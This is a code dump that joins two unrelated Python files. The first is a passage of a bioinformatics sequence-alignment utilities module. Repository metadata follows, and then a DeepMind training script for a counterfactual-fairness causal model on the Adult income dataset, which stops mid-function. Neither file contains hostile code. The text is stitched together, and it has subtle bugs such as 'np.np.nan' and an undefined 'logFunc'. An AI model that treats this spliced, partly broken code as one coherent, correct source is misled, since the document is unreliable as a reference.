dist[j,:] = np.array([i for i in map(lambda a, b: subst.get((a, b), subst.get((b, a))), seq1, seq2)]) j += 1 """Actually, pairwise diversity is a distance, not a similarity so identical AA should be counted as 0""" dist = 1-dist if not bySite: dist = np.nanmean(dist, axis=1) return np.nanmean(dist, axis=0) def _PD_hamming(alignA, alignB, subst, bySite, withinA, ignoreGaps=True): """Computation for pairwise diversity using a vector optimized hamming distance. Optionally ignoreGaps treats gap comparisons as Nan""" L = len(alignA.iloc[0]) gapCode = AA2CODE['-'] """Convert alignments into integer arrays first to speed comparisons""" matA = np.zeros((len(alignA), L)) for seqi, s in enumerate(alignA): matA[seqi,:] = _seq2vec(s) if not withinA: matB = np.zeros((len(alignB), L)) for seqi, s in enumerate(alignB): matB[seqi,:] = _seq2vec(s) """Dist will be 1 where equal, 0 where not and nan if one is a gap""" if withinA: dist=np.zeros((int(scipy.special.comb(len(alignA), 2)), L)) allPairs = itertools.combinations(np.arange(len(alignA)), 2) for j, (seqi1, seqi2) in enumerate(allPairs): dist[j,:] = matA[seqi1,:]!=matA[seqi2,:] if ignoreGaps: gapInd = (matA[seqi1,:]==gapCode) | (matA[seqi2,:]==gapCode) dist[j, gapInd] = np.nan else: dist=np.zeros((len(alignA)*len(alignB), L)) allPairs = itertools.product(np.arange(len(alignA)), np.arange(len(alignB))) for j, (seqiA, seqiB) in enumerate(allPairs): dist[j,:] = matA[seqiA,:]!=matB[seqiB,:] if ignoreGaps: gapInd = (matA[seqiA,:]==gapCode) | (matB[seqiB,:]==gapCode) dist[j, gapInd] = np.nan if not bySite: dist=np.nanmean(dist, axis=1) return np.nanmean(dist, axis=0) def pairwiseMutualInformation(align, nperms=1e4): """Compute the pairwise mutual information of all sites in the alignment Return matrix of M and p-values""" L=len(align[align.index[0]]) columns = [align.map(lambda s: s[i]) for i in np.arange(L)] M = np.nan*np.zeros((L, L)) p = np.nan*np.zeros((L, L)) Mstar = np.nan*np.zeros((L, L)) for xi, yi in itertools.combinations(np.arange(L), 2): freqx = objhist(columns[xi]) freqy = objhist(columns[yi]) tmpM, tmpMstar, tmpp, Hx, Hy, Hxy= mutual_information(columns[xi], columns[yi], logfunc=np.log2, nperms=nperms) """We wouldn't need to test invariant sites or a site with itself""" if len(freqx) == 1 or len(freqy) == 1: tmpp = np.nan elif xi == yi: tmpp = np.np.nan M[xi, yi] = tmpM p[xi, yi] = tmpp Mstar[xi, yi] = tmpMstar q = adjustnonnan(p) return M, Mstar, p, q def seqmat2align(smat,index=None): """Convert from an array of dtype=S1 to alignment""" if index is None: index = np.arange(smat.shape[0]) return pd.Series([''.join(smat[seqi,:].astype(str)) for seqi in np.arange(smat.shape[0])], name='seq', index=index) def align2mat(align, k=1, gapped=True): """Convert an alignment into a 2d numpy array of kmers [nSeqs x nSites/nKmers] If gapped is True, returns kmers with gaps included. If gapped is False, returns "non-gapped" kmers and each kmer starting with a gap is '-'*k See grabKmer() for definition of non-gapped kmer.""" tmp = padAlignment(align) L = len(tmp.iloc[0]) Nkmers = L-k+1 if gapped: """Slightly faster, but not as flexible""" out = np.array([[s[i:i+k] for i in range(Nkmers)] for s in tmp], dtype='S%d' % k) else: out = np.empty((L, Nkmers), dtype='S%d' % k) for seqi, seq in enumerate(tmp): for starti in range(Nkmers): #out[seqi,starti] = seq[starti:starti+k] full, ng = grabKmer(seq, starti, k=k) if ng is None: ng = '-'*k out[seqi, starti] = ng return out def align2aamat(align): """Convert an alignment into a 3d boolean numpy array [nSeqs x nSites x nAAs]""" for seq in align: L = len(seq) break aaMat = align2mat(align) aaFeat = np.zeros((len(align), L, len(AALPHABET))) for seqi, sitei in itertools.product(range(aaFeat.shape[0]), list(range(aaFeat.shape[1]))): try: aai = AALPHABET.index(aaMat[seqi, sitei]) aaFeat[seqi, sitei, aai] = 1. except ValueError: """If AA is not in AALPHABET then it is ignored""" continue return aaFeat def condenseGappyAlignment(a, thresh=0.9): """Find sites with more than thresh percent gaps. Then remove any sequences with non-gaps at these sites and remove the sites from the alignment.""" a = padAlignment(a) smat = align2mat(a) gapSiteInd = np.mean(smat == b'-', axis=0) >= thresh keepSeqInd = np.all(smat[:, gapSiteInd] == b'-', axis=1) print('Removing %d of %d sites and %d of %d sequences from the alignment.' % (gapSiteInd.sum(), smat.shape[1], (~keepSeqInd).sum(), smat.shape[0])) smat = smat[keepSeqInd,:] smat = smat[:, ~gapSiteInd] return seqmat2align(smat, index=a.index[keepSeqInd]) def nx2sif(fn, g): """Write Networkx Graph() to SIF file for BioFabric or Cytoscape visualization""" with open(fn, 'w') as fh: for e in g.edges_iter(): fh.write('%s pp %s\n' % (e[0], e[1])) def generateSequences(a,N=1,useFreqs=True): """Generate new sequences based on those in alignment a The AA at each position are chosen independently from the observed AAs and may or may not be chosen based on their frequency. If useFreqs is True then returns exactly N sequences that are not neccessarily unique. Else returns N unique sequences or as many as possible, printing an error if actualN < N""" a = padAlignment(a) L = len(a.iloc[0]) if useFreqs: smat = empty((N, L), dtype='S1') for i in np.arange(L): oh = objhist(sliceAlign(a, (i, i+1))) smat[:, i] = oh.generateRandomSequence(N, useFreqs=True) else: chunkN = int(ceil(N/10)) smat = None counter = 0 actualN = 0 while actualN < N and counter < N*100: tmpmat = empty((chunkN, L), dtype='S1') for i in np.arange(L): oh = objhist(sliceAlign(a, (i, i+1))) tmpmat[:, i] = oh.generateRandomSequence(chunkN, useFreqs=False) if smat is None: smat = tmpmat else: smat = concatenate((smat, tmpmat), axis=0) smat = unique_rows(smat) actualN = smat.shape[0] counter += 1 outAlign = seqmat2align(smat[:actualN,:]) if actualN<N: print("Could not create N = %d unique sequences with %d attempts" % (N, counter*10)) smat = smat[:actualN,:] outAlign = seqmat2align(smat) return outAlign def kmerConsensus(align,k=9,verbose=False): """From an alignment of sequences create a k-mer consensus sequence by identifying the most common whole k-mer at each start position and using those residues as the consensus. This will result in more than one consensus amino acid at many sites. [What is the object that is returned?] Parameters ---------- align : list or pd.Series Alignment of amino acid sequences all with the same length. k : int Width of the kmer window. Returns ------- con : str Consensus sequence taking the mode at each position full : list of dicts, len(full) == len(con) Each element of the list is a position in the alignment. Each dict contains keys/values of the consesnus residues and their number at each position. Example ------- >>> seqs = ['ABCDE', 'ABCDE', 'ABCDE', 'ABCDE', 'ABCIE', 'ABCIE', 'ABFIE', 'ABFIE', 'ABFIE', 'ABFIE'] >>> kcon,full = kmerConsensus(seqs,k=3,verbose=True) ABC BCD CDE Seq1: true consensus Seq2: 3mer consensus Pos 1 - 5 A B C I E | A B C D E Seq1 (5) and Seq2 (5) are 80.0% similar >>> print full [{'A': 1}, {'B': 2}, {'C': 3}, {'D': 2}, {'E': 1}] """ align = padAlignment(align) L = len(align.iloc[0]) Nkmers = L-k+1 """Get a 2D array of alignment [nSeqs x nSites]""" mat = align2mat(align) full = [dict() for i in np.arange(L)] for starti in np.arange(Nkmers): """Create a temporary alignment of the ith kmer""" tmpA = seqmat2align(mat[:, starti:starti+k]) """Pick off the most common kmer at that start position""" top1 = objhist(tmpA).topN(n=2)[0][0] if verbose: print(' '*starti + top1) #print ' '*starti + objhist(tmpA).topN(n=2)[1][0] """Add each AA in the most frequent kmer to the consensus""" for j, startj in enumerate(np.arange(starti, starti+k)): try: full[startj][top1[j]] += 1 except KeyError: full[startj][top1[j]] = 1 """Consensus is the mode AA at each position in full""" con = ''.join([max(list(pos.keys()), key=pos.get) for pos in full]) if verbose: print('Seq1: true consensus') print('Seq2: %dmer consensus' % k) compSeq(consensus(align), con) return con, full def pepComp(align,useConsensus=True): """Return align with mix of upper and lower case AA residues depending on whether they match or mismatch the consensus or mindist sequence.""" if useConsensus: ref = consensus(align) else: ref = identifyMindist(align) out = [] for seq in align: out.append(''.join([aa.upper() if aa.upper()==refaa.upper() else aa.lower() for aa, refaa in zip(seq, ref)])) return out def tree2pwdist(tree): """Compute pairwise distances between every leaf on the phylogenetic tree. Can use either a Bio.Phylo object or a dendropy.Tree object (much faster). Parameters ---------- tree : obj A phylogenetic tree object. Returns ------- pwdist : pd.DataFrame Symmetric table of all pairwise distances with node labels as columns and index.""" if isinstance(tree, type(Phylo.BaseTree.Tree())): N = len(tree.get_terminals()) names = [node.name for node in tree.get_terminals()] pwdist = np.zeros((N, N)) for i, node1 in enumerate(tree.get_terminals()): for j, node2 in enumerate(tree.get_terminals()): """Compute half of these and assume symmetry""" if i==j: pwdist[i, j] = 0 elif i<j: pwdist[i, j] = tree.distance(node1, node2) pwdist[j, i] = pwdist[i, j] elif isinstance(tree, type(dendropy.Tree())): pdm = dendropy.treecalc.PatristicDistanceMatrix(tree) taxon_set = [n.taxon for n in tree.leaf_nodes()] N = len(taxon_set) names = [taxa.label for taxa in taxon_set] pwdist = np.zeros((N, N)) for i, t1 in enumerate(taxon_set): for j, t2 in enumerate(taxon_set): """Compute half of these and assume symmetry""" if i==j: pwdist[i, j] = 0 elif i<j: pwdist[i, j] = pdm(t1, t2) pwdist[j, i] = pwdist[i, j] else: print('Tree type does not match Phylo.BaseTree.Tree or dendropy.Tree') return return pd.DataFrame(pwdist, index = names, columns = names) def overlappingKmers(s, k=15, overlap=11, includeFinalPeptide=True, returnStartInds=False): """Create a list of overlapping kmers from a single sequence Params ------ s : sequence (sliceable object) k : int Length of each mer overlap : int Overlap between each consecutive kmer includeFinalPeptide : bool If True, include a peptide of length k that covers the end of the sequence. returnStartInds : bool If True, return start indices for each peptide. Returns ------- mers : list of kmers inds : list of indices (optional)""" inds = [i for i in range(0, len(s), k-overlap) if i+k < len(s)] if includeFinalPeptide and not s[-k:] == s[inds[-1]:inds[-1]+k]: inds.append(len(s)-k) mers = [s[i:i+k] for i in inds] if returnStartInds: return mers, inds else: return mers def compSeq(s1, s2, lineL=50): """Print two sequences showing mismatches. Parameters ---------- s1, s2 : str Strings representing aligned AA or NT sequences lineL : int Wrap line at lineL""" lineN = int(np.ceil(min(len(s1), len(s2))/lineL)) count = 0 samecount = 0 outStr = '' for linei in range(lineN): if (linei+1) * lineL < min(len(s1), len(s2)): end = (linei+1) * lineL else: end = min(len(s1), len(s2)) outStr += 'Pos %d - %d\n' % (linei*lineL+1, end-1+1) for sitei in range(linei*lineL, end): outStr += s1[sitei] outStr += '\n' for sitei in range(linei*lineL, end): out = ' ' if s1[sitei] == s2[sitei] else '|' outStr += out count += 1 samecount += 1 if s1[sitei]==s2[sitei] else 0 outStr += '\n' for sitei in range(linei*lineL, end): out = '.' if s1[sitei] == s2[sitei] else s2[sitei] outStr += s2[sitei] outStr += '\n\n' outStr += 'Seq1 (%d) and Seq2 (%d) are %1.1f%% similar\n\n' % (len(s1), len(s2), 1e2*samecount/count) print(outStr) def getStartPos(peptide, seq, subst=None): """Align the peptide with seq using the supplied substitution matrix and return the start position. Start position is 0-based Parameters ---------- peptide : str Peptide to align. seq : str AA sequence. subst : dict of dicts Scores for each pair of AAs in peptide and sequence. Returns ------- start : int Start position 0-based.""" return getStartPosMapper(seq, subst)(peptide) def getStartPosMapper(seq, subst=None): """Factory that returns a function to align peptides to seq. Can be used as the mapping function for a peptide column in a DataFrame, to align the column to a reference sequence Parameters ---------- seq : str AA sequence. subst : dict of dicts Scores for each pair of AAs in peptide and sequence. Returns ------- findPos : function Function with one argument: a peptide sequence to align.""" if subst is None: subst = make_identity_substitution_matrix(1, -1, alphabet=AALPHABET) def findPos(pep): d = ssw(pep) return int(d['query_begin'] - d['target_begin']) ssw = StripedSmithWaterman(query_sequence=seq, protein=True, substitution_matrix=subst) return findPos def mutual_information(x, y, logfunc=np.log2, nperms=1e4): """Calculates mutual information between the paired iterables x and y Returns M(x,y), p-value, and entropy of x, y, and zip(x,y) Methods are all described in Gilbert et al. (AIDS 2005)""" def entropy(freqDict): return -np.array([p*logFunc(p) for p in freqDict.values()]).sum() freqx = objhist(x) freqy = objhist(y) Hx = freqx.entropy() Hy = freqy.entropy() Hxy = objhist(zip(x,y)).entropy() M = Hx + Hy - Hxy Mstar = 2*M / (Hx+Hy) if len(freqx)==1 or len(freqy)==1: p = 1 elif np.all([xi==yi for xi,yi in zip(x,y)]): p = 0 else: Mperms = np.array([Hx + Hy - objhist(zip(permutation(x),y)).entropy() for i in np.arange(nperms)]) p = (Mperms >= M).sum() / nperms return M, Mstar, p, Hx, Hy, Hxy def kl(p, q): """Kullback-Leibler divergence D(P || Q) for discrete distributions Parameters ---------- p, q : array-like, dtype=float, shape=n Discrete probability distributions. """ p = np.asarray(p, dtype=float) q = np.asarray(q, dtype=float) return np.where(p != 0, p * np.log(p / q), 0).sum()
agartland/utils
seqtools.py
Python
mit
37,732
[ "Cytoscape" ]
c5130d73a43b444a3cf7176e2b3d7f8062ab379a8bd09858533b91135dd370f4
# Copyright 2020 DeepMind Technologies Limited. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================ """Training script for causal model for Adult dataset, using PSCF.""" import functools import time from typing import Any, List, Mapping, NamedTuple, Sequence from absl import app from absl import flags from absl import logging import haiku as hk import jax import jax.numpy as jnp from ml_collections.config_flags import config_flags import numpy as np import optax import pandas as pd from sklearn import metrics import tensorflow as tf import tensorflow_datasets as tfds from tensorflow_probability.substrates import jax as tfp from counterfactual_fairness import adult from counterfactual_fairness import causal_network from counterfactual_fairness import utils from counterfactual_fairness import variational FLAGS = flags.FLAGS config_flags.DEFINE_config_file( 'config', 'adult_pscf_config.py', 'Training configuration.') LOG_EVERY = 100 # These are all aliases to callables which will return instances of # particular distribution modules, or a Node itself. This is used to make # subsequent code more legible. Node = causal_network.Node Gaussian = causal_network.Gaussian MLPMultinomial = causal_network.MLPMultinomial def build_input(train_data: pd.DataFrame, batch_size: int, training_steps: int, shuffle_size: int = 10000): """See base class.""" num_epochs = (training_steps // batch_size) + 1 ds = utils.get_dataset(train_data, batch_size, shuffle_size, num_epochs=num_epochs) ds = ds.prefetch(tf.data.AUTOTUNE) return iter(tfds.as_numpy(ds)) class CausalNetOutput(NamedTuple): q_hidden_obs: Sequence[tfp.distributions.Distribution] p_hidden: Sequence[tfp.distributions.Distribution] hidden_samples: Sequence[jnp.ndarray] log_p_obs_hidden: jnp.ndarray is_male: jnp.ndarray # indicates which elements of the batch correspond to # male individuals def build_causal_graph(train_data: pd.DataFrame, column_names: List[str], inputs: jnp.ndarray): """Build the causal graph of the model.""" make_multinomial = functools.partial( causal_network.MLPMultinomial.from_frame, hidden_shape=(100,)) make_gaussian = functools.partial( causal_network.Gaussian, hidden_shape=(100,)) # Construct the graphical model. Each random variable is represented by an # instance of the `Node` class, as discussed in that class's docstring. # The following nodes have no parents, and thus the distribution modules # will not be conditional on anything -- they simply represent priors. node_a = Node(MLPMultinomial.from_frame(train_data, 'sex')) node_c1 = Node(MLPMultinomial.from_frame(train_data, 'native-country')) node_c2 = Node(Gaussian('age', column_names.index('age'))) # These are all hidden nodes, that do not correspond to any actual data in # pandas dataframe loaded previously. We therefore are permitted to control # the dimensionality of these nodes as we wish (with the `dim` argument). # The distribution module here should be interpreted as saying that we are # imposing a multi-modal prior (a mixture of Gaussians) on each latent # variable. node_hm = Node(causal_network.GaussianMixture('hm', 10, dim=2), hidden=True) node_hl = Node(causal_network.GaussianMixture('hl', 10, dim=2), hidden=True) node_hr1 = Node( causal_network.GaussianMixture('hr1', 10, dim=2), hidden=True) node_hr2 = Node( causal_network.GaussianMixture('hr2', 10, dim=2), hidden=True) node_hr3 = Node( causal_network.GaussianMixture('hr3', 10, dim=2), hidden=True) # The rest of the graph is now constructed; the order of construction is # important, so we can inform each node of its parents. # Note that in the paper we simply have one node called "R", but here it is # separated into three separate `Node` instances. This is necessary since # each node can only represent a single quantity in the dataframe. node_m = Node( make_multinomial(train_data, 'marital-status'), [node_a, node_hm, node_c1, node_c2]) node_l = Node( make_gaussian('education-num', column_names.index('education-num')), [node_a, node_hl, node_c1, node_c2, node_m]) node_r1 = Node( make_multinomial(train_data, 'occupation'), [node_a, node_c1, node_c2, node_m, node_l]) node_r2 = Node( make_gaussian('hours-per-week', column_names.index('hours-per-week')), [node_a, node_c1, node_c2, node_m, node_l]) node_r3 = Node( make_multinomial(train_data, 'workclass'), [node_a, node_c1, node_c2, node_m, node_l]) node_y = Node( MLPMultinomial.from_frame(train_data, 'income'), [node_a, node_c1, node_c2, node_m, node_l, node_r1, node_r2, node_r3]) # We now construct several (self-explanatory) collections of nodes. These # will be used at various points later in the code, and serve to provide # greater semantic interpretability. observable_nodes = (node_a, node_c1, node_c2, node_l, node_m, node_r1, node_r2, node_r3, node_y) # The nodes on which each latent variable is conditionally dependent. # Note that Y is not in this list, since all of its dependencies are # included below, and further it does not depend directly on Hm. nodes_on_which_hm_depends = (node_a, node_c1, node_c2, node_m) nodes_on_which_hl_depends = (node_a, node_c1, node_c2, node_m, node_l) nodes_on_which_hr1_depends = (node_a, node_c1, node_c2, node_m, node_l, node_r1) nodes_on_which_hr2_depends = (node_a, node_c1, node_c2, node_m, node_l, node_r2) nodes_on_which_hr3_depends = (node_a, node_c1, node_c2, node_m, node_l, node_r3) hidden_nodes = (node_hm, node_hl, node_hr1, node_hr2, node_hr3) # Function to create the distribution needed for variational inference. This # is the same for each latent variable. def make_q_x_obs_module(node): """Make a Variational module for the given hidden variable.""" assert node.hidden return variational.Variational( common_layer_sizes=(20, 20), output_dim=node.dim) # For each latent variable, we first construct a Haiku module (using the # function above), and then connect it to the graph using the node's # value. As described in more detail in the documentation for `Node`, # these values represent actual observed data. Therefore we will later # be connecting these same modules to the graph in different ways in order # to perform fair inference. q_hm_obs_module = make_q_x_obs_module(node_hm) q_hl_obs_module = make_q_x_obs_module(node_hl) q_hr1_obs_module = make_q_x_obs_module(node_hr1) q_hr2_obs_module = make_q_x_obs_module(node_hr2) q_hr3_obs_module = make_q_x_obs_module(node_hr3) causal_network.populate(observable_nodes, inputs) q_hm_obs = q_hm_obs_module( *(node.observed_value for node in nodes_on_which_hm_depends)) q_hl_obs = q_hl_obs_module( *(node.observed_value for node in nodes_on_which_hl_depends)) q_hr1_obs = q_hr1_obs_module( *(node.observed_value for node in nodes_on_which_hr1_depends)) q_hr2_obs = q_hr2_obs_module( *(node.observed_value for node in nodes_on_which_hr2_depends)) q_hr3_obs = q_hr3_obs_module( *(node.observed_value for node in nodes_on_which_hr3_depends)) q_hidden_obs = (q_hm_obs, q_hl_obs, q_hr1_obs, q_hr2_obs, q_hr3_obs) return observable_nodes, hidden_nodes, q_hidden_obs def build_forward_fn(train_data: pd.DataFrame, column_names: List[str], likelihood_multiplier: float): """Create the model's forward pass.""" def forward_fn(inputs: jnp.ndarray) -> CausalNetOutput: """Forward pass.""" observable_nodes, hidden_nodes, q_hidden = build_causal_graph( train_data, column_names, inputs) (node_hm, node_hl, node_hr1, node_hr2, node_hr3) = hidden_nodes (node_a, _, _, _, _, _, _, _, node_y) = observable_nodes # Log-likelihood function. def log_p_obs_h(hm_value, hl_value, hr1_value, hr2_value, hr3_value): """Compute log P(A, C, M, L, R, Y | H).""" # In order to create distributions like P(M | H_m, A, C), we need # the value of H_m that we've been provided as an argument, rather than # the value stored on H_m (which, in fact, will never be populated # since H_m is unobserved). # For compactness, we first construct the complete list of replacements. node_to_replacement = { node_hm: hm_value, node_hl: hl_value, node_hr1: hr1_value, node_hr2: hr2_value, node_hr3: hr3_value, } def log_prob_for_node(node): """Given a node, compute it's log probability for the given latents.""" log_prob = jnp.squeeze( node.make_distribution(node_to_replacement).log_prob( node.observed_value)) return log_prob # We apply the likelihood multiplier to all likelihood terms except that # for Y, the target. This is then added on separately in the line below. sum_no_y = likelihood_multiplier * sum( log_prob_for_node(node) for node in observable_nodes if node is not node_y) return sum_no_y + log_prob_for_node(node_y) q_hidden_obs = tuple(q_hidden) p_hidden = tuple(node.distribution for node in hidden_nodes) rnd_key = hk.next_rng_key() hidden_samples = tuple( q_hidden.sample(seed=rnd_key) for q_hidden in q_hidden_obs) log_p_obs_hidden = log_p_obs_h(*hidden_samples) # We need to split our batch of data into male and female parts. is_male = jnp.equal(node_a.observed_value[:, 1], 1) return CausalNetOutput( q_hidden_obs=q_hidden_obs, p_hidden=p_hidden, hidden_samples=hidden_samples, log_p_obs_hidden=log_p_obs_hidden, is_male=is_male) def fair_inference_fn(inputs: jnp.ndarray, batch_size: int, num_prediction_samples: int): """Get the fair and unfair predictions for the given input.""" observable_nodes, hidden_nodes, q_hidden_obs = build_causal_graph( train_data, column_names, inputs) (node_hm, node_hl, node_hr1, node_hr2, node_hr3) = hidden_nodes (node_a, node_c1, node_c2, node_l, node_m, node_r1, node_r2, node_r3, node_y) = observable_nodes (q_hm_obs, q_hl_obs, q_hr1_obs, q_hr2_obs, q_hr3_obs) = q_hidden_obs rnd_key = hk.next_rng_key() # *** FAIR INFERENCE *** # To predict Y in a fair sense: # * Infer Hm given observations. # * Infer M using inferred Hm, baseline A, real C # * Infer L using inferred Hl, M, real A, C # * Infer Y using inferred M, baseline A, real C # This is done by numerical integration, i.e. draw samples from # p_fair(Y | A, C, M, L). a_all_male = jnp.concatenate( (jnp.zeros((batch_size, 1)), jnp.ones((batch_size, 1))), axis=1) # Here we take a num_samples per observation. This results to # an array of shape: # (num_samples, batch_size, hm_dim). # However, forward pass is easier by reshaping to: # (num_samples * batch_size, hm_dim). hm_dim = 2 def expanded_sample(distribution): return distribution.sample( num_prediction_samples, seed=rnd_key).reshape( (batch_size * num_prediction_samples, hm_dim)) hm_pred_sample = expanded_sample(q_hm_obs) hl_pred_sample = expanded_sample(q_hl_obs) hr1_pred_sample = expanded_sample(q_hr1_obs) hr2_pred_sample = expanded_sample(q_hr2_obs) hr3_pred_sample = expanded_sample(q_hr3_obs) # The values of the observed nodes need to be tiled to match the dims # of the above hidden samples. The `expand` function achieves this. def expand(observed_value): return jnp.tile(observed_value, (num_prediction_samples, 1)) expanded_a = expand(node_a.observed_value) expanded_a_baseline = expand(a_all_male) expanded_c1 = expand(node_c1.observed_value) expanded_c2 = expand(node_c2.observed_value) # For M, and all subsequent variables, we only generate one sample. This # is because we already have *many* samples from the latent variables, and # all we require is an independent sample from the distribution. m_pred_sample = node_m.make_distribution({ node_a: expanded_a_baseline, node_hm: hm_pred_sample, node_c1: expanded_c1, node_c2: expanded_c2}).sample(seed=rnd_key) l_pred_sample = node_l.make_distribution({ node_a: expanded_a, node_hl: hl_pred_sample, node_c1: expanded_c1, node_c2: expanded_c2, node_m: m_pred_sample}).sample(seed=rnd_key) r1_pred_sample = node_r1.make_distribution({ node_a: expanded_a, node_hr1: hr1_pred_sample, node_c1: expanded_c1, node_c2: expanded_c2, node_m: m_pred_sample, node_l: l_pred_sample}).sample(seed=rnd_key) r2_pred_sample = node_r2.make_distribution({ node_a: expanded_a, node_hr2: hr2_pred_sample, node_c1: expanded_c1, node_c2: expanded_c2, node_m: m_pred_sample, node_l: l_pred_sample}).sample(seed=rnd_key) r3_pred_sample = node_r3.make_distribution({ node_a: expanded_a, node_hr3: hr3_pred_sample, node_c1: expanded_c1, node_c2: expanded_c2, node_m: m_pred_sample, node_l: l_pred_sample}).sample(seed=rnd_key) # Finally, we sample from the distribution for Y. Like above, we only # draw one sample per element in the array. y_pred_sample = node_y.make_distribution({ node_a: expanded_a_baseline, # node_a: expanded_a, node_c1: expanded_c1, node_c2: expanded_c2, node_m: m_pred_sample, node_l: l_pred_sample, node_r1: r1_pred_sample, node_r2: r2_pred_sample, node_r3: r3_pred_sample}).sample(seed=rnd_key) # Reshape back to (num_samples, batch_size, y_dim), undoing the expanding # operation used for sampling. y_pred_sample = y_pred_sample.reshape( (num_prediction_samples, batch_size, -1)) # Now form an array of shape (batch_size, y_dim) by taking an expectation # over the sample dimension. This represents the probability that the # result is in each class. y_pred_expectation = jnp.mean(y_pred_sample, axis=0) # Find out the predicted y, for later use in a confusion matrix. predicted_class_y_fair = utils.multinomial_class(y_pred_expectation) # *** NAIVE INFERENCE *** predicted_class_y_unfair = utils.multinomial_class(node_y.distribution) return predicted_class_y_fair, predicted_class_y_unfair return forward_fn, fair_inference_fn def _loss_fn( forward_fn, beta: float, mmd_sample_size: int, constraint_multiplier: float, constraint_ratio: float, params: hk.Params, rng: jnp.ndarray, inputs: jnp.ndarray, ) -> jnp.ndarray: """Loss function definition.""" outputs = forward_fn(params, rng, inputs) loss = _loss_klqp(outputs, beta) # if (constraint_ratio * constraint_multiplier) > 0: constraint_loss = 0. # Create constraint penalty and add to overall loss term. for distribution in outputs.q_hidden_obs: constraint_loss += (constraint_ratio * constraint_multiplier * utils.mmd_loss(distribution, outputs.is_male, mmd_sample_size, rng)) # Optimisation - don't do the computation if the multiplier is set to zero. loss += constraint_loss return loss def _evaluate( fair_inference_fn, params: hk.Params, rng: jnp.ndarray, inputs: jnp.ndarray, batch_size: int, num_prediction_samples: int, ): """Perform evaluation of fair inference.""" output = fair_inference_fn(params, rng, inputs, batch_size, num_prediction_samples) return output def _loss_klqp(outputs: CausalNetOutput, beta: float) -> jnp.ndarray: """Compute the loss on data wrt params.""" expected_log_q_hidden_obs = sum( jnp.sum(q_hidden_obs.log_prob(hidden_sample), axis=1) for q_hidden_obs, hidden_sample in zip(outputs.q_hidden_obs, outputs.hidden_samples)) assert expected_log_q_hidden_obs.ndim == 1 # For log probabilities computed from distributions, we need to sum along # the last axis, which takes the product of distributions for # multi-dimensional hidden variables. log_p_hidden = sum( jnp.sum(p_hidden.log_prob(hidden_sample), axis=1) for p_hidden, hidden_sample in zip(outputs.p_hidden, outputs.hidden_samples)) assert outputs.log_p_obs_hidden.ndim == 1 kl_divergence = ( beta * (expected_log_q_hidden_obs - log_p_hidden) - outputs.log_p_obs_hidden) return jnp.mean(kl_divergence) class Updater: """A stateless abstraction around an init_fn/update_fn pair. This extracts some common boilerplate from the training loop. """ def __init__(self, net_init, loss_fn, eval_fn, optimizer: optax.GradientTransformation, constraint_turn_on_step): self._net_init = net_init self._loss_fn = loss_fn self._eval_fn = eval_fn self._opt = optimizer self._constraint_turn_on_step = constraint_turn_on_step @functools.partial(jax.jit, static_argnums=0) def init(self, init_rng, data): """Initializes state of the updater.""" params = self._net_init(init_rng, data) opt_state = self._opt.init(params) out = dict( step=np.array(0), rng=init_rng, opt_state=opt_state, params=params, ) return out @functools.partial(jax.jit, static_argnums=0) def update(self, state: Mapping[str, Any], data: jnp.ndarray): """Updates the state using some data and returns metrics.""" rng = state['rng'] params = state['params'] constraint_ratio = (state['step'] > self._constraint_turn_on_step).astype( float) loss, g = jax.value_and_grad(self._loss_fn, argnums=1)( constraint_ratio, params, rng, data) updates, opt_state = self._opt.update(g, state['opt_state']) params = optax.apply_updates(params, updates) new_state = { 'step': state['step'] + 1, 'rng': rng, 'opt_state': opt_state, 'params': params, } new_metrics = { 'step': state['step'], 'loss': loss, } return new_state, new_metrics @functools.partial(jax.jit, static_argnums=(0, 3, 4)) def evaluate(self, state: Mapping[str, Any], inputs: jnp.ndarray, batch_size: int, num_prediction_samples: int): """Evaluate fair inference.""" rng = state['rng'] params = state['params'] fair_pred, unfair_pred = self._eval_fn(params, rng, inputs, batch_size, num_prediction_samples) return fair_pred, unfair_pred def main(_): flags_config = FLAGS.config # Create the dataset. train_data, test_data = adult.read_all_data(FLAGS.dataset_dir) column_names = list(train_data.columns) train_input = build_input(train_data, flags_config.batch_size, flags_config.num_steps) # Set up the model, loss, and updater. forward_fn, fair_inference_fn = build_forward_fn( train_data, column_names, flags_config.likelihood_multiplier) forward_fn = hk.transform(forward_fn) fair_inference_fn = hk.transform(fair_inference_fn) loss_fn = functools.partial(_loss_fn, forward_fn.apply, flags_config.beta, flags_config.mmd_sample_size, flags_config.constraint_multiplier) eval_fn = functools.partial(_evaluate, fair_inference_fn.apply) optimizer = optax.adam(flags_config.learning_rate) updater = Updater(forward_fn.init, loss_fn, eval_fn, optimizer, flags_config.constraint_turn_on_step) # Initialize parameters. logging.info('Initializing parameters...') rng = jax.random.PRNGKey(42) train_data = next(train_input) state = updater.init(rng, train_data) # Training loop. logging.info('Starting train loop...') prev_time = time.time() for step in range(flags_config.num_steps): train_data = next(train_input) state, stats = updater.update(state, train_data) if step % LOG_EVERY == 0: steps_per_sec = LOG_EVERY / (time.time() - prev_time) prev_time = time.time() stats.update({'steps_per_sec': steps_per_sec}) logging.info({k: float(v) for k, v in stats.items()}) # Evaluate. logging.info('Starting evaluation...') test_input = build_input(test_data, flags_config.batch_size, training_steps=0, shuffle_size=0) predicted_test_y = [] corrected_test_y = [] while True: try: eval_data = next(test_input) # Now run the fair prediction; this projects the input to the latent space # and then performs sampling. predicted_class_y_fair, predicted_class_y_unfair = updater.evaluate( state, eval_data, flags_config.batch_size, flags_config.num_prediction_samples) predicted_test_y.append(predicted_class_y_unfair) corrected_test_y.append(predicted_class_y_fair) # logging.info('Completed evaluation step %d', step) except StopIteration: logging.info('Finished evaluation') break # Join together the predictions from each batch. test_y = np.concatenate(predicted_test_y, axis=0) tweaked_test_y = np.concatenate(corrected_test_y, axis=0) # Note the true values for computing accuracy and confusion matrices. y_true = test_data['income'].cat.codes # Make sure y_true is the same size y_true = y_true[:len(test_y)] test_accuracy = metrics.accuracy_score(y_true, test_y) tweaked_test_accuracy = metrics.accuracy_score( y_true, tweaked_test_y) # Print out accuracy and confusion matrices. logging.info('Accuracy (full model): %f', test_accuracy) logging.info('Confusion matrix:') logging.info(metrics.confusion_matrix(y_true, test_y)) logging.info('') logging.info('Accuracy (tweaked with baseline: Male): %f', tweaked_test_accuracy) logging.info('Confusion matrix:') 